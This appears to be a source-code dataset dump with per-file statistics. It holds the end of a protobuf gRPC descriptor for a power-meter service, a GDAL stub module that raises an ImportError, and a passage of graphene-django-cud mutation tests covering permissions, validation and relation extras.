name='SetWavelength',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.SetWavelength',
index=7,
containing_service=None,
input_type=_SETWAVELENGTHREQUEST,
output_type=_SETWAVELENGTHRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetMode',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.GetMode',
index=8,
containing_service=None,
input_type=_GETMODEREQUEST,
output_type=_GETMODERESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='SetMode',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.SetMode',
index=9,
containing_service=None,
input_type=_SETMODEREQUEST,
output_type=_SETMODERESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='GetAutorange',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.GetAutorange',
index=10,
containing_service=None,
input_type=_GETAUTORANGEREQUEST,
output_type=_GETAUTORANGERESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='SetAutorange',
full_name='instrosetta.interfaces.light_analysis.power_meter.v1.PowerMeter.SetAutorange',
index=11,
containing_service=None,
input_type=_SETAUTORANGEREQUEST,
output_type=_SETAUTORANGERESPONSE,
serialized_options=None,
),
])
_sym_db.RegisterServiceDescriptor(_POWERMETER)
DESCRIPTOR.services_by_name['PowerMeter'] = _POWERMETER
# @@protoc_insertion_point(module_scope)
| 42.865385
| 5,449
| 0.766994
| 7,133
| 60,183
| 6.187719
| 0.041217
| 0.039332
| 0.094841
| 0.115459
| 0.789428
| 0.760745
| 0.745656
| 0.741963
| 0.711625
| 0.693024
| 0
| 0.032234
| 0.110795
| 60,183
| 1,403
| 5,450
| 42.895937
| 0.792525
| 0.048751
| 0
| 0.688958
| 1
| 0.000778
| 0.291389
| 0.254758
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003888
| 0
| 0.003888
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
853ba7fcb50055e5c0c7cda38cf013a0abf3f59a
| 190
|
py
|
Python
|
swig/python/osgeo/utils.py
|
FeU-aKlos/gdal
|
bba6781133815248c9329842d365f8812b74c33f
|
[
"Apache-2.0"
] | 3,100
|
2015-01-02T10:33:40.000Z
|
2022-03-31T02:06:51.000Z
|
swig/python/osgeo/utils.py
|
FeU-aKlos/gdal
|
bba6781133815248c9329842d365f8812b74c33f
|
[
"Apache-2.0"
] | 3,496
|
2015-01-06T16:53:30.000Z
|
2022-03-31T20:18:51.000Z
|
swig/python/osgeo/utils.py
|
FeU-aKlos/gdal
|
bba6781133815248c9329842d365f8812b74c33f
|
[
"Apache-2.0"
] | 2,036
|
2015-01-08T20:22:12.000Z
|
2022-03-31T10:24:08.000Z
|
raise ImportError("Please use `import osgeo_utils` (GDAL >= 3.3) "
"instead of `import osgeo.utils` (GDAL == 3.2). "
"For more details see GDAL RFC #78")
| 47.5
| 67
| 0.552632
| 25
| 190
| 4.16
| 0.72
| 0.211538
| 0.307692
| 0.384615
| 0.403846
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046154
| 0.315789
| 190
| 3
| 68
| 63.333333
| 0.753846
| 0
| 0
| 0
| 0
| 0
| 0.663158
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
857ddc5437f40dad5e3975e2c162273720f4f681
| 63,016
|
py
|
Python
|
graphene_django_cud/tests/test_mutations.py
|
janosroden/graphene-django-cud
|
5a77f874e880a30f0941a0bc016188b9b0f892ad
|
[
"MIT"
] | null | null | null |
graphene_django_cud/tests/test_mutations.py
|
janosroden/graphene-django-cud
|
5a77f874e880a30f0941a0bc016188b9b0f892ad
|
[
"MIT"
] | null | null | null |
graphene_django_cud/tests/test_mutations.py
|
janosroden/graphene-django-cud
|
5a77f874e880a30f0941a0bc016188b9b0f892ad
|
[
"MIT"
] | null | null | null |
import graphene
from addict import Dict
from django.test import TestCase
from graphene import Schema
from graphql import ResolveInfo
from graphql_relay import to_global_id
from graphene_django_cud.mutations import DjangoUpdateMutation, DjangoCreateMutation
from graphene_django_cud.tests.factories import (
UserFactory,
CatFactory,
UserWithPermissionsFactory,
DogFactory,
MouseFactory,
)
from graphene_django_cud.tests.models import User, Cat, Dog, DogRegistration
from graphene_django_cud.util import disambiguate_id
def mock_info(context=None):
return ResolveInfo(
None,
None,
None,
None,
schema=None,
fragments=None,
root_value=None,
operation=None,
variable_values=None,
context=context,
)
class TestUpdateMutation(TestCase):
def test__model_registered__does_not_raise_error(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateMutation(DjangoUpdateMutation):
class Meta:
model = User
def test_permissions__user_has_no_permission__returns_error(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
permissions = ("tests.change_cat",)
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
def test_permissions__user_has_permission__does_not_return_error(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
permissions = ("tests.change_cat",)
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserWithPermissionsFactory.create(permissions=["tests.change_cat"])
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
def test_get_permissions__empty_list__overrides_and_grants_access(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
# This will be overridden
permissions = ("tests.change_cat",)
@classmethod
def get_permissions(cls, root, info, *args, **kwargs):
return []
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
def test_get_permissions__list_with_permissions__requires_returned_permissions(
self,
):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
@classmethod
def get_permissions(cls, root, info, *args, **kwargs):
return ["tests.change_cat"]
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
user_with_permissions = UserWithPermissionsFactory.create(
permissions=["tests.change_cat"]
)
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user_with_permissions),
)
self.assertIsNone(result.errors)
def test_get_permissions__conditional_list__requires_returned_permissions(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
@classmethod
def get_permissions(cls, root, info, input, id, *args, **kwargs):
owner_id = int(disambiguate_id(input["owner"]))
if info.context.user.id == owner_id:
return []
return ["tests.change_cat"]
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
new_cat_owner = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Name",
"owner": to_global_id("UserNode", new_cat_owner.id),
},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Name",
"owner": to_global_id("UserNode", new_cat_owner.id),
},
},
context=Dict(user=new_cat_owner),
)
self.assertIsNone(result.errors)
def test_check_permissions__override__uses_new_check_permissions_to_grant_access(
self,
):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
# This will be overridden
permissions = ("tests.change_cat",)
@classmethod
def check_permissions(cls, root, info, input, id, obj) -> None:
if input["name"] == "Name 2":
raise ValueError("Cannot be Name 2")
return None
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name 2", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name 3", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
def test_validate__validate_field_does_nothing__passes(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
@classmethod
def validate_name(cls, root, info, value, input, id, obj):
pass
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create()
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Name", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
def test_validate__validate_field_raises__returns_error(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
@classmethod
def validate_name(cls, root, info, value, input, id, obj):
owner = User.objects.get(pk=disambiguate_id(input["owner"]))
if value == owner.get_full_name():
raise ValueError("Cat must have different name than owner")
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
user = UserFactory.create(first_name="John", last_name="Doe")
cat = CatFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {
"name": "John Doe",
"owner": to_global_id("UserNode", user.id),
},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
result = schema.execute(
mutation,
variables={
"id": to_global_id("UserNode", user.id),
"input": {"name": "Kitty", "owner": to_global_id("UserNode", user.id)},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
def test_field_types__specified__overrides_field_type(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateDogMutation(DjangoUpdateMutation):
class Meta:
model = Dog
field_types = {"tag": graphene.Int()}
@classmethod
def handle_tag(self, value, *args, **kwargs):
return f"Dog-{value}"
class Mutations(graphene.ObjectType):
update_dog = UpdateDogMutation.Field()
dog = DogFactory.create()
user = UserFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDog(
$id: ID!,
$input: UpdateDogInput!
){
updateDog(id: $id, input: $input){
dog{
id
}
}
}
"""
# Result with a string in the tag field should fail now
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"tag": "not-an-int",
"breed": "HUSKY",
"owner": to_global_id("UserNode", user.id),
},
},
context=Dict(user=user),
)
self.assertEqual(len(result.errors), 1)
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"breed": "HUSKY",
"tag": 25,
"owner": to_global_id("UserNode", user.id),
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
class TestUpdateMutationManyToManyOnReverseField(TestCase):
def test_default_setup__adding_resource_by_id__adds_resource(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
dog = DogFactory.create()
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemies": [to_global_id("DogNode", dog.id)],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 1)
def test_default_setup__calling_with_empty_list__resets_relation(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
# Create some enemies
dog = DogFactory.create_batch(5)
cat.enemies.set(dog)
self.assertEqual(cat.enemies.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemies": [],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 0)
def test_many_to_many_extras__calling_exact_with_empty_list__resets_relation(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
many_to_many_extras = {"enemies": {"exact": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
# Create some enemies
dog = DogFactory.create_batch(5)
cat.enemies.set(dog)
self.assertEqual(cat.enemies.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemies": [],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 0)
def test_many_to_many_extras__add_extra_by_id__adds_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
many_to_many_extras = {"enemies": {"add": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
# Create some enemies
dog = DogFactory.create_batch(5)
self.assertEqual(cat.enemies.all().count(), 0)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemiesAdd": [dog.id for dog in dog],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 5)
def test_many_to_many_extras__add_extra_by_input__adds_by_input(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateDogMutation(DjangoCreateMutation):
class Meta:
model = Dog
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
many_to_many_extras = {"enemies": {"exact": {"type": "CreateDogInput"}}}
class Mutations(graphene.ObjectType):
create_dog = CreateDogMutation.Field()
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
# Create some enemies
dog = DogFactory.create_batch(5)
self.assertEqual(cat.enemies.all().count(), 0)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemies": [
{
"name": dog.name,
"breed": dog.breed,
"tag": dog.tag,
"owner": dog.owner.id,
}
for dog in dog
],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 5)
def test_many_to_many_extras__remove_extra_by_id__removes_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateCatMutation(DjangoUpdateMutation):
class Meta:
model = Cat
many_to_many_extras = {"enemies": {"remove": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_cat = UpdateCatMutation.Field()
cat = CatFactory.create()
user = UserFactory.create()
# Create some enemies
dog = DogFactory.create_batch(5)
cat.enemies.set(dog)
self.assertEqual(cat.enemies.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateCat(
$id: ID!,
$input: UpdateCatInput!
){
updateCat(id: $id, input: $input){
cat{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("CatNode", cat.id),
"input": {
"name": "Garfield",
"owner": to_global_id("UserNode", user.id),
"enemiesRemove": [dog.id for dog in dog],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
cat.refresh_from_db()
self.assertEqual(cat.enemies.all().count(), 0)
class TestUpdateMutationManyToManyExtras(TestCase):
def test_many_to_many_extras__calling_exact_with_empty_list__resets_relation(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateDogMutation(DjangoUpdateMutation):
class Meta:
model = Dog
many_to_many_extras = {"enemies": {"exact": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_dog = UpdateDogMutation.Field()
dog = DogFactory.create()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5)
dog.enemies.set(cats)
self.assertEqual(dog.enemies.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDog(
$id: ID!,
$input: UpdateDogInput!
){
updateDog(id: $id, input: $input){
dog{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"tag": "tag",
"breed": "HUSKY",
"owner": to_global_id("UserNode", user.id),
"enemies": [],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
dog.refresh_from_db()
self.assertEqual(dog.enemies.all().count(), 0)
def test_many_to_many_extras__add_extra_by_id__adds_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateDogMutation(DjangoUpdateMutation):
class Meta:
model = Dog
many_to_many_extras = {"enemies": {"add": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_dog = UpdateDogMutation.Field()
dog = DogFactory.create()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5)
self.assertEqual(dog.enemies.all().count(), 0)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDog(
$id: ID!,
$input: UpdateDogInput!
){
updateDog(id: $id, input: $input){
dog{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"tag": "tag",
"breed": "HUSKY",
"owner": to_global_id("UserNode", user.id),
"enemiesAdd": [cat.id for cat in cats],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
dog.refresh_from_db()
self.assertEqual(dog.enemies.all().count(), 5)
def test_many_to_many_extras__add_extra_by_input__adds_by_input(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class CreateCatMutation(DjangoCreateMutation):
class Meta:
model = Cat
class UpdateDogMutation(DjangoUpdateMutation):
class Meta:
model = Dog
many_to_many_extras = {"enemies": {"exact": {"type": "CreateCatInput"}}}
class Mutations(graphene.ObjectType):
create_cat = CreateCatMutation.Field()
update_dog = UpdateDogMutation.Field()
dog = DogFactory.create()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5)
self.assertEqual(dog.enemies.all().count(), 0)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDog(
$id: ID!,
$input: UpdateDogInput!
){
updateDog(id: $id, input: $input){
dog{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"tag": "tag",
"breed": "HUSKY",
"owner": to_global_id("UserNode", user.id),
"enemies": [
{"name": cat.name, "owner": cat.owner.id} for cat in cats
],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
dog.refresh_from_db()
self.assertEqual(dog.enemies.all().count(), 5)
def test_many_to_many_extras__remove_extra_by_id__removes_by_id(self):
# This registers the UserNode type
# noinspection PyUnresolvedReferences
from .schema import UserNode
class UpdateDogMutation(DjangoUpdateMutation):
class Meta:
model = Dog
many_to_many_extras = {"enemies": {"remove": {"type": "ID"}}}
class Mutations(graphene.ObjectType):
update_dog = UpdateDogMutation.Field()
dog = DogFactory.create()
user = UserFactory.create()
# Create some enemies
cats = CatFactory.create_batch(5)
dog.enemies.set(cats)
self.assertEqual(dog.enemies.all().count(), 5)
schema = Schema(mutation=Mutations)
mutation = """
mutation UpdateDog(
$id: ID!,
$input: UpdateDogInput!
){
updateDog(id: $id, input: $input){
dog{
id
}
}
}
"""
result = schema.execute(
mutation,
variables={
"id": to_global_id("DogNode", dog.id),
"input": {
"name": "Sparky",
"tag": "tag",
"breed": "HUSKY",
"owner": to_global_id("UserNode", user.id),
"enemiesRemove": [cat.id for cat in cats],
},
},
context=Dict(user=user),
)
self.assertIsNone(result.errors)
dog.refresh_from_db()
self.assertEqual(dog.enemies.all().count(), 0)
class TestUpdateMutationManyToOneExtras(TestCase):
    """Tests for DjangoUpdateMutation configured with `many_to_one_extras`."""

    # All tests in this class issue the same update mutation document.
    UPDATE_USER_MUTATION = """
        mutation UpdateUser(
            $id: ID!,
            $input: UpdateUserInput!
        ){
            updateUser(id: $id, input: $input){
                user{
                    id
                }
            }
        }
    """

    @staticmethod
    def _execute(schema, variables, user):
        """Run the shared update mutation with an authenticated context."""
        return schema.execute(
            TestUpdateMutationManyToOneExtras.UPDATE_USER_MUTATION,
            variables=variables,
            context=Dict(user=user),
        )

    @staticmethod
    def _input_for(user, **extra):
        """Build the base `input` payload for *user*, merged with *extra* keys."""
        payload = {
            "username": user.username,
            "firstName": user.first_name,
            "lastName": user.last_name,
            "email": user.email,
        }
        payload.update(extra)
        return payload

    def test_many_to_one_extras__auto_calling_mutation_with_setting_field__does_nothing(
        self,
    ):
        """An `exact: auto` extra left unset in the input leaves the relation alone."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class UpdateUserMutation(DjangoUpdateMutation):
            class Meta:
                model = User
                exclude_fields = ("password",)
                many_to_one_extras = {"cats": {"exact": {"type": "auto"}}}

        class Mutations(graphene.ObjectType):
            update_user = UpdateUserMutation.Field()

        user = UserFactory.create()
        self.assertEqual(user.cats.all().count(), 0)

        schema = Schema(mutation=Mutations)
        result = self._execute(
            schema,
            {
                "id": to_global_id("UserNode", user.id),
                "input": self._input_for(user),
            },
            user,
        )
        self.assertIsNone(result.errors)
        user.refresh_from_db()
        self.assertEqual(user.cats.all().count(), 0)

    def test_many_to_one_extras__calling_exact_with_empty_list__resets_relation(self):
        """Passing an empty list to an `exact: ID` extra clears the relation."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class UpdateUserMutation(DjangoUpdateMutation):
            class Meta:
                model = User
                exclude_fields = ("password",)
                many_to_one_extras = {"cats": {"exact": {"type": "ID"}}}

        class Mutations(graphene.ObjectType):
            update_user = UpdateUserMutation.Field()

        user = UserFactory.create()
        # Create some cats owned by the user so the relation starts non-empty.
        CatFactory.create_batch(5, owner=user)
        self.assertEqual(user.cats.all().count(), 5)

        schema = Schema(mutation=Mutations)
        result = self._execute(
            schema,
            {
                "id": to_global_id("UserNode", user.id),
                "input": self._input_for(user, cats=[]),
            },
            user,
        )
        self.assertIsNone(result.errors)
        user.refresh_from_db()
        self.assertEqual(user.cats.all().count(), 0)

    def test_many_to_one_extras__set_exact_by_id__sets_by_id(self):
        """An `exact: ID` extra assigns exactly the given related objects."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class UpdateUserMutation(DjangoUpdateMutation):
            class Meta:
                model = User
                exclude_fields = ("password",)
                many_to_one_extras = {"cats": {"exact": {"type": "ID"}}}

        class Mutations(graphene.ObjectType):
            update_user = UpdateUserMutation.Field()

        user = UserFactory.create()
        # Cats with no owner yet; the mutation should attach them.
        unowned_cats = CatFactory.create_batch(5)
        self.assertEqual(user.cats.all().count(), 0)

        schema = Schema(mutation=Mutations)
        result = self._execute(
            schema,
            {
                "id": to_global_id("UserNode", user.id),
                "input": self._input_for(
                    user, cats=[cat.id for cat in unowned_cats]
                ),
            },
            user,
        )
        self.assertIsNone(result.errors)
        user.refresh_from_db()
        self.assertEqual(user.cats.all().count(), 5)

    def test_many_to_one_extras__add_by_id__adds_by_id(self):
        """An `add: ID` extra appends to the relation without touching existing rows."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class UpdateUserMutation(DjangoUpdateMutation):
            class Meta:
                model = User
                exclude_fields = ("password",)
                many_to_one_extras = {"cats": {"add": {"type": "ID"}}}

        class Mutations(graphene.ObjectType):
            update_user = UpdateUserMutation.Field()

        user = UserFactory.create()
        # Five already owned, five to be added by the mutation.
        CatFactory.create_batch(5, owner=user)
        new_cats = CatFactory.create_batch(5)
        self.assertEqual(user.cats.all().count(), 5)

        schema = Schema(mutation=Mutations)
        result = self._execute(
            schema,
            {
                "id": to_global_id("UserNode", user.id),
                "input": self._input_for(
                    user, catsAdd=[cat.id for cat in new_cats]
                ),
            },
            user,
        )
        self.assertIsNone(result.errors)
        user.refresh_from_db()
        self.assertEqual(user.cats.all().count(), 10)

    def test_many_to_one_extras__add_by_input__adds_by_input(self):
        """An `add: auto` extra creates new related objects from nested input."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class CreateCatMutation(DjangoCreateMutation):
            class Meta:
                model = Cat

        class UpdateUserMutation(DjangoUpdateMutation):
            class Meta:
                model = User
                exclude_fields = ("password",)
                many_to_one_extras = {"cats": {"add": {"type": "auto"}}}

        class Mutations(graphene.ObjectType):
            create_cat = CreateCatMutation.Field()
            update_user = UpdateUserMutation.Field()

        user = UserFactory.create()
        # No cats to begin with.
        self.assertEqual(user.cats.all().count(), 0)

        schema = Schema(mutation=Mutations)
        result = self._execute(
            schema,
            {
                "id": to_global_id("UserNode", user.id),
                "input": self._input_for(
                    user, catsAdd=[{"name": "Cat damon"} for _ in range(5)]
                ),
            },
            user,
        )
        self.assertIsNone(result.errors)
        user.refresh_from_db()
        self.assertEqual(user.cats.all().count(), 5)

    def test_many_to_one_extras__remove_extra_by_id__removes_by_id(self):
        """A `remove: ID` extra detaches the given related objects."""
        # This registers the UserNode type
        # noinspection PyUnresolvedReferences
        from .schema import UserNode

        class UpdateUserMutation(DjangoUpdateMutation):
            class Meta:
                model = User
